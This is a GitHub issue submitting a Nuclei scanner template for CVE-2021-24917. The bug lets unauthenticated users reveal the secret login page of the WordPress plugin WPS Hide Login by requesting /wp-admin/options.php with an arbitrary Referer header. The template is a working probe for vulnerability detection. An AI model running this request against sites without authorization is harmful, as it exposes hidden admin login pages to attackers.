### ISSUE TITLE
CVE-2021-24917 - WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#5270]
### Template for

CVE-2021-24917

### Details:

```yaml
id: CVE-2021-24917

info:
  name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header
  author: akincibor
  severity: low
  description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
  reference:
    - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
  tags: wp,wordpress,wp-plugin,unauth

requests:
  - raw:
      - |
        GET /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Referer: something

    extractors:
      - type: kval
        kval:
          - location
    matchers-condition: and
    matchers:
      - type: word
        part: location
        words:
          - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'
      - type: dsl
        dsl:
         - "!contains(tolower(location), 'wp-login.php')"
```
